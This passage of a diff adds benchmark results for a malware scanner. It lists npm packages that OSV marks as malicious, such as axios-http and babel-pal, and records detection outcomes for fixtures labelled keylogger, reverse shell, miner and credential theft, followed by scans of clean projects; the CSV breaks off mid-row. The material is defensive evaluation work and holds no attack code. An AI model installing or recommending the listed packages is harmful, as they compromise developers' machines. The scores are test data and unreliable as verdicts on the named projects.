"verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: babel-node" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15289", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15289; report blob 283dd8d75b91d4a35c89707bd10115e3d2ff9c69", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-pal/MAL-2025-15289.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:283dd8d75b91d4a35c89707bd10115e3d2ff9c69:55744bedf6294386bdc1eec2313e9b485a77322f", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: babel-pal" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15238", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15238; report blob aceadeea25bc4b32b766096204db12a15315e090", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-http/MAL-2025-15238.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:aceadeea25bc4b32b766096204db12a15315e090:30af885d0884dd6cec7fdbfb7ba0a3248110b517", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: axios-http" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2023-116", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2023-116; report blob 0d58b457e7175cc230bff6d7b6da40d3781a5466", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-proxy/MAL-2023-116.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:0d58b457e7175cc230bff6d7b6da40d3781a5466:216fcbc2c9356dbccfd103971f088bcb84682b06", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: axios-proxy" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-4813", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-4813; report blob bcd00abcd6ee4bb4083f79b6e4d10b6d289aa392", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-browserify/MAL-2025-4813.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:bcd00abcd6ee4bb4083f79b6e4d10b6d289aa392:2bae461ccd66abc5ecc0082b8681a81c125302b6", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: axios-browserify" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-190832", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-190832; report blob b9b988a111a6e0915333f4b29ce75fb1fe05f293", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-builder/MAL-2025-190832.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:b9b988a111a6e0915333f4b29ce75fb1fe05f293:6ac5ebe76f27904cfdec2d27badfa7ad53d6f11d", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: axios-builder" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2024-10692", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2024-10692; report blob 79cb12c286a16d2f04288db57a43bce0b197d907", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-mockadptr/MAL-2024-10692.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:79cb12c286a16d2f04288db57a43bce0b197d907:4a871bf8d97a4ffd916e71d4102e1a09b3d38d6d", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: axios-mockadptr" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-191389", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-191389; report blob 6bae4d1fc6ab36b3516d10c59910f905e50c4f3a", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-cancelable/MAL-2025-191389.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:6bae4d1fc6ab36b3516d10c59910f905e50c4f3a:5a611b4143b8b29595533761d56448dc59603cd8", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: axios-cancelable" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2026-2631", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2026-2631; report blob d20844f3c5e46ef0707cdad324c86ce0b027a8fa", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-plugin-blocks/MAL-2026-2631.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:d20844f3c5e46ef0707cdad324c86ce0b027a8fa:4f055c91abd296b619826fad2bb36752f7f939a7", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: babel-plugin-blocks" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-47613", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-47613; report blob 3075fa3df8d2b7a89c816127adda2b9188415350", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-ganache/MAL-2025-47613.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:3075fa3df8d2b7a89c816127adda2b9188415350:2aaacc868e3b819e0e9d4dbb9a9d58b5d83906ff", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: babel-ganache" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2026-407", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2026-407; report blob 6bbba35a96333e1960acec15928b07c83544e48a", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-js/MAL-2026-407.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:6bbba35a96333e1960acec15928b07c83544e48a:9897f3726f56deb821827c8de18501abead258f2", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: babel-js" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15287", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15287; report blob 910018e9ea790fae8a6c9141550913cf26e5275d", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-npm-install/MAL-2025-15287.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:910018e9ea790fae8a6c9141550913cf26e5275d:8082edb8ce35bdad9a7e5c961b346e42d7d218a3", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: babel-npm-install" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-15288", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-15288; report blob 4a51f824f7203deffb5fd237dc4105ebfbfeba03", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-npm-publish/MAL-2025-15288.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:4a51f824f7203deffb5fd237dc4105ebfbfeba03:c79c0836d3e4e5c0e39da8e406463977b538d0d7", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: babel-npm-publish" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "malicious-osv-mal-2025-3985", + "corpus": "real-malicious", + "label": "known-malicious-metadata", + "labelSource": "OpenSSF OSV MAL-2025-3985; report blob eb426f1379301192517dbb30aad8a7b4e6993343", + "sourceUrl": "https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loader-fs/MAL-2025-3985.json", + "immutableRef": "osv:1fcca18f1775b47bd272362330684aa2dd1ad870:eb426f1379301192517dbb30aad8a7b4e6993343:655664c120057afcca26233ac537a2622d3d7e2c", + "expectedDetectionCategories": [ + "SUSPICIOUS_DEPENDENCY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.25, + "safeToClone": false, + "rulesTriggered": [ + "SUSPICIOUS_DEPENDENCY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "high", + "type": "SUSPICIOUS_DEPENDENCY", + "rule": "SUSPICIOUS_DEPENDENCY", + "file": "package.json", + "line": null, + "description": "Known malicious package: babel-loader-fs" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + } + ] +} diff --git a/benchmark/results/pre-fix-baseline.csv b/benchmark/results/pre-fix-baseline.csv new file mode 100644 index 0000000..d414481 --- /dev/null +++ b/benchmark/results/pre-fix-baseline.csv @@ -0,0 +1,91 @@ +"sample_id","corpus","label","label_source","source_url","immutable_ref","expected_detection_category","minimum_expected_verdict","maximum_expected_verdict","status","test_passed","category_detected","verdict_pass","actual_verdict","actual_score","safe_to_clone","rules_triggered","finding_severities","finding_confidences","false_positive_notes","files_scanned","files_skipped","tree_truncated","duration_ms","engine_version","engine_commit_sha","detection_rules_version","detection_rules_commit_sha","error" +"critical-keylogger-exfil-v1","critical-fixture","known-malicious-structure","Flagrix claimed behavior: keyboard capture plus network sink","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:47ddfcaf4652dcead3194f3be5f4bdc8e1b43742","EXFIL_KEYLOGGER","high","","completed","true","true","true","high","0.4","false","EXFIL_KEYLOGGER","critical","high","","1","0","false","30","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-beavertail-loader-v1","critical-fixture","known-malicious-structure","Flagrix claimed Lazarus BeaverTail loader structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:cd28e14b93bd48d8fc52714787299569897f6408","BEAVERTAIL_LOADER_V1","high","","completed","true","true","true","high","0.4","false","BEAVERTAIL_LOADER_V1","critical","high","","1","0","false","3","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-env-exfil-v1","critical-fixture","known-malicious-structure","Flagrix claimed environment-variable exfiltration structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:11214d0e6bf271f10d443bf17c16d83232e2f297","BEAVERTAIL_EXFIL","high","","completed","false","false","false","low","0","true","","","","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-reverse-shell-v1","critical-fixture","known-malicious-structure","Flagrix claimed reverse-shell socket structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:7153bab0dd4955bc942b4d68228a6f16d416a328","REVERSE_SHELL","high","","completed","true","true","true","high","0.4","false","REVERSE_SHELL","critical","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-crypto-miner-v1","critical-fixture","known-malicious-structure","Flagrix claimed cryptocurrency-miner endpoint structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:09955ea0b3c26412934cd61e99cc25a921f8c943","CRYPTO_MINER","high","","completed","true","true","true","high","0.4","false","CRYPTO_MINER","critical","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-obfuscated-eval-v1","critical-fixture","known-malicious-structure","Flagrix claimed Base64-decoded dynamic execution structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:3f60ed22624352d562b694600d87f7a37bf81fe3","OBFUSCATED_EVAL","medium","","completed","true","true","true","medium","0.5","false","OBFUSCATED_EVAL | OBF_EVAL","high | high","high | high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-rce-endpoint-v1","critical-fixture","known-malicious-structure","Flagrix claimed request-driven remote-code-execution structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:e4084292f92b05d88db1c0b433a74ab63e8ff3ca","BACKDOOR_RCE_ENDPOINT","high","","completed","true","true","true","high","0.65","false","BACKDOOR_RCE_ENDPOINT | OBF_EVAL","critical | high","high | high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-credential-file-read-v1","critical-fixture","known-malicious-structure","Flagrix claimed credential-file access structure","https://github.com/flagrix-io/flagrix-detection-rules","fixture-v1:895568b6b685834b3d6cf7186308ccc7f23f3cbe","FILE_ACCESS_CREDENTIALS","high","","completed","true","true","true","high","0.4","false","FILE_ACCESS_CREDENTIALS","critical","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-aws-key-v1","critical-fixture","known-malicious-structure","Flagrix claimed AWS access-key pattern using a reserved dummy value","https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html","fixture-v1:a1296c58a00d76c777714d5d8b3d877227a0558d","HARDCODED_AWS_KEY","high","","completed","true","true","true","high","0.4","false","HARDCODED_AWS_KEY","critical","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"critical-install-script-v1","critical-fixture","known-malicious-structure","Flagrix claimed install-time download and dynamic execution structure","https://github.com/flagrix-io/flagrix-scanner-core","fixture-v1:611f7347091fa4506e2f4ef8884a30fd011f7314","POSTINSTALL_SCRIPT","high","","completed","true","true","true","high","0.65","false","POSTINSTALL_SCRIPT","high | critical","unspecified | unspecified","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-fixture-keyboard-shortcut-v1","reference-fixture","reference-clean","Regression control for ordinary keyboard UI handling","https://github.com/flagrix-io/flagrix-scanner-core","fixture-v1:0ffca52988c432109773a57e23c338551b9c51b8","","","low","completed","true","true","true","low","0","true","","","","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-fixture-placeholder-secret-v1","reference-fixture","reference-clean","Regression control for documented placeholder configuration","https://github.com/9valleb9/SPY-Options-Dashboard","fixture-v1:d55f3f65c602eb1f695a587f61db7d635bfa1ad7","","","low","completed","true","true","true","low","0.05","true","HARDCODED_API_KEY","low","high","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-fixture-flask-debug-v1","reference-fixture","reference-clean","Regression control: deployment warning must not be labeled a backdoor","https://github.com/9valleb9/SPY-Options-Dashboard","fixture-v1:18c530bc5c541ea2a330c43493279fc8e9686e26","","","low","completed","true","true","true","low","0.05","true","INSECURE_CONFIGURATION","low","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-fixture-detector-regex-v1","reference-fixture","reference-clean","Regression control for security tools containing inert detector regexes","https://github.com/flagrix-io/flagrix-scanner-core","fixture-v1:977043432c1a3f3ec5c5914bcdbb96c33c6e8995","","","low","completed","true","true","true","low","0","true","","","","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-fixture-event-stream-safe-version-v1","reference-fixture","reference-clean","Version-bound negative control for the compromised event-stream 3.3.6 incident","https://github.com/dominictarr/event-stream","package:event-stream@4.0.1:4989205f2c15c653baf5fd41bbacb8a7f6d55bad","","","low","completed","true","true","true","low","0.25","true","SUSPICIOUS_DEPENDENCY","high","unspecified","Manual review required; this result is not yet classified as a false positive.","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-express","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/expressjs/express","ae6dd37680e3a00618d6c8a3e522f0ee4eeba1a4","","","low","completed","false","true","false","high","0.85","false","OBF_BASE64_HEAVY | OBF_EVAL","medium | medium | medium | medium | high","high | high | high | high | high","Manual review required; this result is not yet classified as a false positive.","151","62","false","282608","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-fastify","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/fastify/fastify","de3752df84bb8dd35a8226bb467f05862f4da57c","","","low","completed","true","true","true","low","0.24","true","OBF_BASE64_HEAVY | DATA_EXFILTRATION","medium | medium","high | medium","","200","193","false","3773","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-koa","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/koajs/koa","52d5e8ff5ac79f2479463b53df2999900ae95115","","","low","completed","true","true","true","low","0","true","","","","","84","27","false","2708","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-axios","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/axios/axios","3ebc76240c835a07fc6af23cb10d41579371a08f","","","low","completed","false","true","false","high","1","false","BEAVERTAIL_EXFIL | EXFIL_COOKIE | DATA_EXFILTRATION | NETWORK_COMMUNICATION","critical | critical | high | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | critical | high | high","high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | high | unspecified","Manual review required; this result is not yet classified as a false positive.","200","254","false","3550","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-lodash","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/lodash/lodash","a666ba591064c8011988275790ad7d625279f09c","","","low","completed","false","true","false","high","1","false","OBF_HEX_STRINGS | EXFIL_COOKIE | OBF_BASE64_HEAVY | OBF_EVAL | OBF_NEW_FUNCTION | OBFUSCATED_CODE | NETWORK_COMMUNICATION | DATA_EXFILTRATION","medium | medium | medium | medium | high | medium | high | high | high | high | high | high | high | high | high | medium","high | high | high | high | high | high | high | high | unspecified | high | high | unspecified | high | unspecified | unspecified | medium","Manual review required; this result is not yet classified as a false positive.","63","97","false","11540","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-chalk","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/chalk/chalk","aa06bb5ac3f14df9fda8cfb54274dfc165ddfdef","","","low","completed","true","true","true","low","0.15","true","TYPOSQUAT_PACKAGE","medium","unspecified","","21","13","false","2741","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-uuid","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/uuidjs/uuid","ea83515d6a4de13a8f9d253fe772752c9dd7bbbe","","","low","completed","true","true","true","low","0.09","true","SUSPICIOUS_FILE_ACCESS","medium","medium","","100","34","false","3556","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-node-fetch","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/node-fetch/node-fetch","8b3320d2a7c07bce4afc6b2bf6c3bbddda85b01f","","","low","completed","true","true","true","low","0","true","","","","","27","26","false","2232","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-react","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/facebook/react","c0c39a6b3907eaab35f43074949e2957a2a734c1","","","low","completed","true","true","true","low","0.25","true","NETWORK_COMMUNICATION","high","unspecified","Manual review required; this result is not yet classified as a false positive.","200","7070","false","5341","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-vue","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/vuejs/core","9e03beb6b4c85a9d5b49b731c08263aa648e2a2a","","","low","completed","false","true","false","high","0.75","false","OBF_NEW_FUNCTION","high | high | high","high | high | high","Manual review required; this result is not yet classified as a false 